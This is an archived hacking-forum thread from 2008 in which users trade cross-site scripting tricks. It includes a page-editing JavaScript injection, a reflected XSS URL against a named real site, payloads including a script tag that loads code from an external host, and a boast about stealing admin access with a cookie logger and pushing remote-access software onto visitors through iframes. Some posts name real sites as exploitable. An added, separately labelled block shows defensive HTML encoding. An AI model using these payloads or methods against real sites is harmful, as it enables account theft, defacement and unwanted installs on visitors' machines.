Wednesday, April 23, 2014
HellBound Hackers | Computer General | Web hacking


fun with xss


Guest
Posted on 20-09-08 03:03
Here is a little fun you can have with xss. You can use javascript code:
javascript: document.body.contentEditable ='true'; document.designMode='on'; void 0 (take out the space between javascript: document *damn smileys)

inside your xss statement. Anyone who visits the page you just xss'ed can now edit the page to their liking. *I know this is old code, and I know that lots of people know about it, but I have never heard of anyone injecting it into an xss attack. (have fun)




Edited by on 20-09-08 03:24

RE: fun with xss

yours31f
Member



Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank:
Elite
Posted on 29-09-08 20:28
This is a pretty good idea.

anyways I was doing some xss testing and came across this...

http://www.estellegetty.com/fan_list/page.php?action=%3Cscript%3Ealert(%22yours31f%22);%3C/script%3E


I thought it was pretty funny.


Debugging is what programmers do to beta software to make it take up more room on your hard drive if it is running too efficiently.



RE: fun with xss

rex_mundi
☆ Lucifer ☆



Posts: 1459
Location: Scotland
Joined: 20.02.08
Rank:
God
Posted on 29-09-08 20:42
Is this your mum's site? :right:


U N Ⓡⓔⓧ_Ⓜⓤⓝⓓⓘ

RE: fun with xss

yours31f
Member



Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank:
Elite
Posted on 29-09-08 20:48
Nope. One of my friends asked me to help him see if it was secure. (I didn't do much btw, so I don't know if it has any holes.)



RE: fun with xss

rex_mundi
☆ Lucifer ☆



Posts: 1459
Location: Scotland
Joined: 20.02.08
Rank:
God
Posted on 29-09-08 20:53
Trying to deface a dead pensioner's site, man, tut tut.



RE: fun with xss

yours31f
Member



Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank:
Elite
Posted on 29-09-08 20:59
Nope, I was just helping to secure it. I was asked for help, and it will be fixed tomorrow.



RE: fun with xss


Guest
Posted on 29-09-08 22:45
Best fun I've ever had with XSS was iFrames.
The XSS allowed me to chuck a cookie logger on the page.
Then once I had admin cPanel I chucked iFrames all over it : ]
If a site already has some activex on it then you're in luck.
Create an iFrame linking to your logmein vpn install software page.
Then upon visiting a vnc is installed for you.
Wow wasn't that easy.
I'll draw up some code for it today.
I got work at computer help now :ninja:




Edited by on 29-09-08 22:55

RE: fun with xss

yours31f
Member



Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank:
Elite
Posted on 29-09-08 23:31
Right now I'm just doing this
Code

"> <script>alert("xssed");</script>

"</textarea> <script>alert("xssed");</script>

"><script src="http://yours31f.ulmb.com/xss.html"></script>










Edited by yours31f on 29-09-08 23:32

RE: fun with xss


Guest
Posted on 29-09-08 23:59
yours3lf, if you're talking about xssing the site you just posted, I don't think that is going to work (at least from ?page.php=xsshere). It looks like they are using switch case and the default case displays that error page. Good luck though.
Edit: I lied about the switch case. That is the default error message, but you still won't be able to xss it since it won't return the values back onto the page.

Edited by on 30-09-08 00:02
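
Added example, not part of the thread or any poster's code: the reply above notes that a page which never writes the parameter back cannot be attacked this way; the sketch below covers the other defensive case, where the value is reflected but HTML-encoded first, using the two inline test strings posted earlier in the thread. The template and the names `escapeHtml`, `renderRaw`, `renderEncoded` and `breaksOut` are hypothetical, made up for illustration.

```javascript
// Added illustration: reflect a request parameter into two HTML contexts
// (an attribute value and a <textarea> body), raw versus HTML-encoded.
// All function names and the template are constructed for this example.

// Encode the five characters that let a value leave an HTML text or
// quoted attribute context. '&' must be replaced first.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable form: the parameter is concatenated straight into the markup.
function renderRaw(action) {
  return '<input name="action" value="' + action + '">' +
         '<textarea name="note">' + action + '</textarea>';
}

// Hardened form: same template, every reflection goes through escapeHtml.
function renderEncoded(action) {
  const safe = escapeHtml(action);
  return '<input name="action" value="' + safe + '">' +
         '<textarea name="note">' + safe + '</textarea>';
}

// Crude textual check: does the rendered page contain a <script> element
// that the template itself never emits?
function breaksOut(html) {
  return /<script[\s>]/i.test(html);
}

// The two inline test strings from the thread (constructed input here).
const samples = [
  '"> <script>alert("xssed");</script>',
  '"</textarea> <script>alert("xssed");</script>',
];

function report() {
  return samples.map((s) => ({
    input: s,
    rawBreaksOut: breaksOut(renderRaw(s)),
    encodedBreaksOut: breaksOut(renderEncoded(s)),
  }));
}

console.log(report());
```

This encoding is only correct for HTML body and quoted-attribute contexts; values written into script blocks, URLs or CSS need the encoder for that context.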

RE: fun with xss

rex_mundi
☆ Lucifer ☆



Posts: 1459
Location: Scotland
Joined: 20.02.08
Rank:
God
Posted on 30-09-08 00:07
Dude, don't encourage him.



RE: fun with xss

fashizzlepop
Member



Posts: 482
Location: Old folks home.
Joined: 08.04.08
Rank:
Moderate
Posted on 30-09-08 00:10
lol


"The definition of insanity is doing the same thing over and over again and expecting different results.
~Albert Einstein~



RE: fun with xss

rex_mundi
☆ Lucifer ☆



Posts: 1459
Location: Scotland
Joined: 20.02.08
Rank:
God
Posted on 30-09-08 00:11
You know it's true Pfft



RE: fun with xss


Guest
Posted on 30-09-08 00:32
yours31f wrote:
Right now I'm just doing this
Code

"> <script>alert("xssed");</script>

"</textarea> <script>alert("xssed");</script>

"><script src="http://yours31f.ulmb.com/xss.html"></script>





Go back to the cheat sheet and get some more ideas.




Edited by on 30-09-08 04:18

RE: fun with xss


Guest
Posted on 30-09-08 03:08
Most of the sites hosted by the Russian Information Network are pretty exploitable to XSS. There are quite a few of them, and even search.rin.ru, their main search engine, is exploitable. This is good for experimentally learning more about the exploit and how it can be used for things other than creating alert boxes and stealing cookies. XSS is a powerful exploit that is often misused; attempt not to add on to the misuse.

RE: fun with xss


Guest
Posted on 30-09-08 03:16
Frown
You shouldn't put URLs if you're going to tell the community
that they're vulnerable to some sort of attack...



RE: fun with xss


Guest
Posted on 30-09-08 03:35
Technically, I didn't post the URL. I only posted the host, which is one of many parts of a full URL. Despite this, I do understand what you are trying to say and I'll be more careful next time. Grin

RE: fun with xss

yours31f
Member



Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank:
Elite
Posted on 30-09-08 03:39
and the one I posted (as far as I know) is not.



RE: fun with xss


Guest
Posted on 30-09-08 03:53
Well you must not know much, because what you posted is a full-fledged URL. Your last post was both pointless and incorrect. Make use of the time you spend writing pointless posts and read.

http://www.mattcu. . .finitions/

Seriously, if only you'd use Google more often, you wouldn't be flamed as often.

Edited by on 30-09-08 03:54

RE: fun with xss


Guest
Posted on 30-09-08 04:02
HZ wrote:
Well you must not know much, because what you posted is a full-fledged URL. Your last post was both pointless and incorrect. Make use of the time you spend writing pointless posts and read.

http://www.mattcu. . .finitions/

Seriously, if only you'd use Google more often, you wouldn't be flamed as often.


I think he was speaking of the fact that the URL he posted
wasn't vulnerable.

Please, as a (new) member of this community, don't be so
quick to flame other members of the community



RE: fun with xss

yours31f
Member



Posts: 1678
Location: Dallas Texas
Joined: 27.04.07
Rank:
Elite
Posted on 30-09-08 04:07
That's exactly what I was saying.

